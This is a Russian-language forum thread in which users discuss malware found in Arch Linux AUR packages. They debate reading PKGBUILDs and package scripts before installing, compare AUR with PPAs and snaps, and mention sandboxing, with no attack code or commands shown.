  • 1.61, Аноним (62), 16:36, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Внезапно, в AUR'е и гентушных оверлеях можно хоть скрипт сборочный почитать, что он делает. В отличие от PPA и всяких васянских помоек с уже собранными бинарниками, которыми так любят обмазыватся убунтуи и редхатоиды.
     
     
  • 2.67, нах (?), 17:33, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    ты не поверишь, в большинстве этих помоек есть source repo. Но из него никто никогда не ставит, как и рачеводы никогда не читают свои сборочные скрипты, а гентушники все ждут и ждут ебилдов, не умея написать свой.

    Пока кто-то добрый не создаст им прямо в хомяке файл с именем PWNED!!! , тогда, может быть, замечают что что-то не так.

    разумеется, есть редкие исключения, но они тоже есть везде.

     
     
  • 3.90, axredneck (?), 20:30, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > рачеводы никогда не читают свои сборочные скрипты

    Я читаю

     
  • 3.114, Аноним (62), 08:34, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >ты не поверишь, в большинстве этих помоек есть source repo.

    В больших, типа epel'я есть, а в мелких, на пять-десять пакетов пару раз только видел, и то оне были копроративные, а васяны подобными тонкими материями не заморачиваются.

    >рачеводы никогда не читают свои сборочные скрипты, а гентушники все ждут и ждут ебилдов, не умея написать свой.

    Я и ебилд могу написать, и deb/rpm пакет собрать, но зачем, если кто-то уже сделал? Тот, кто этим пакетом давно занимается, по-любому лучше меня знает всякие нюансы, из-за которых пакет может не собраться или собраться с косяками. А еще его поддерживать надо, апдейтить и с другими пакетами стыковать.

     
  • 3.117, Daemon (??), 09:31, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • –2 +/
    а при чем тут source repo? пакет (как минимум deb, за rpm не ручаюсь) - это архив, который можно распаковать, а в нем и находятся скрипты, которые выполняются во время установки или удаления пакета (preinst, postinst, prerm, postrm) их можно посмотреть перед установкой.
    в добавок apt перед установкой какого-нибудь пакета сразу говорит что собирается ставить и ожидает подтверждения. Список этот можно сохранить, вместо install выполнить download (чтобы загрузить пакеты без установки), и дальше архиватором пройтись по загруженным архивам на поиск трояна.
    Да, долго, да неудобно, но возможно же.
     
     
  • 4.131, Аноним (131), 13:32, 13/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    На сколько пакетов тебя хватит?
     
  • 2.68, anonymous (??), 17:34, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ну почитал и что. То же что и на бинарник поглядеть. Читатели блин.
     

  • 1.85, lucentcode (ok), 20:06, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Эка невидаль. А PKGBUILD на что yaourt каждый раз заботливо предлагает читать? Большинство из них очень простенькие. Есть пакеты с патчсетами, где диффы прямо с пакетом идут, но их мало и патчи как правило тоже маленькие. Для важных мне пакетов я не ленюсь каждый раз просматривать PKGBUILD, ну и изучать остальные задействованные при сборке файлы, если они вызывают пусть и слабые, но подозрения. Зная как работает AUR, нужно просто им правильно пользоваться. А от бяки никто не застрахован. Вот недавно в snap-пакетах майнеры находили. Не удивлюсь, если и в пакетах какого-то не очень популярного дистра(или хотя-бы в ppa популярного) найдут подобные "подарки". А пацику, что отвайтхейтил неосторожных пользователей AUR спасибо сказать нужно - он ничем деструктивным не побаловался на их тачках, и при этом преподал им ценный урок. Будут читать PKGBUILD-ы теперь.
     
     
  • 2.95, axredneck (?), 20:51, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > А PKGBUILD на что yaourt каждый раз заботливо предлагает читать

    Есть, правда, еще pacaur, который, если не ошибаюсь, молча качает и ставит.

     
  • 2.123, J.L. (?), 12:57, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Для важных мне пакетов я не ленюсь каждый раз просматривать PKGBUILD

    а не важные для вас пакеты значит хомяк не овнят?
    с остальным согласен

    просто не метод всё глазами и руками делать, так можно дойти до самостоятельного написания нужных лично программ
    тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных данных вместо реальных и тд

     
     
  • 3.142, lucentcode (ok), 23:49, 29/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > просто не метод всё глазами и руками делать, так можно дойти до
    > самостоятельного написания нужных лично программ
    > тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных
    > данных вместо реальных и тд

    Согласен, только пока ничего подобного не видел. И не факт что кто-то вообще возьмётся подобное пилить. Больше надежды что кто-то допилит песочницу для flatpack, и отсутствующее в репах ПО будут ставить из хаба с пакетами flatpack.

     

  • 1.99, Sluggard (ok), 21:22, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Как-то не удивляет и не пугает такое. AUR в Арче, юзерские PPA в Убунту, репы home:user в Сусе — это всегда неизвестно что и на свой страх и риск.
     
  • 1.101, ы (?), 21:29, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    большинство пипла, судя по комментам, не в курсе с чем едят aur, а с чем нет, но, чсх, мнение имеют.
     
  • 1.110, Аноним (110), 01:48, 12/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > В данные пакеты был добавлен код для загрузки и запуска скрипта...

    Типичный линуксоидно-школотронский стиль - засунем в билды всяких примочек, скриптов, картинок! Пусть дыры зияют, главное - можно запускать свои идиотские скрипты. Хотя казалось бы, это СБОРКА - пиши программу так, чтобы в ней не приходилось ничего "шаманить" со средой, файлами и т.п. Просто скомпили *.c - чего тебе ещё надо??

     
     
  • 2.113, Аноним (62), 08:27, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Внизaпна, унутре твоих любимых .exe тоже есть скрипты, но тебе их не покажут, чтоб не травмировать нежную хипсторскую психику.
     
  • 2.141, arisu (ok), 20:03, 16/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    вот тебе, например, рабочих мозгов надо.
     

  • 1.119, Аноним (119), 10:59, 12/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Та норм тема аур.  Все кто его хейтят просто завидуют, что в их дистре нет подобной штуки. Понятно дело во всем есть свои минусы и плюсы, но плюсы аура перевешивают минусы. От установки говна никакая ос не застрахована.
     
     
  • 2.121, Аноним (23), 12:30, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Все кто его хейтят просто завидуют,

    Перевод с арчеводного на русский:
    "хейтить" - не любить, не восторгаться, непочтительно и неуважительно отзываться о проекте
    Т.е. на самом деле все, кто не пользуется аркой - люто завидуют!

     
  • 2.136, Аноним (136), 20:52, 14/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Все завидуют,ага.
    Особенно bsdишники и гентушники ХD
     

  • 1.124, Аноним (124), 14:13, 12/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    > В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com

    Проделки космонафта. Хочет сравнить с результаты с бубунтой.

     
     
  • 2.125, нах (?), 16:46, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    плюсадын (выпиливает apport - еще один троянец, помимо "contest"а)
     

  • 1.135, Аноним (136), 20:50, 14/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >В AUR-репозитории Arch Linux найдено вредоносное ПО

    А сколько ещё не выявлено.)
    Зато модно стильно и молодёжно.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2020 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру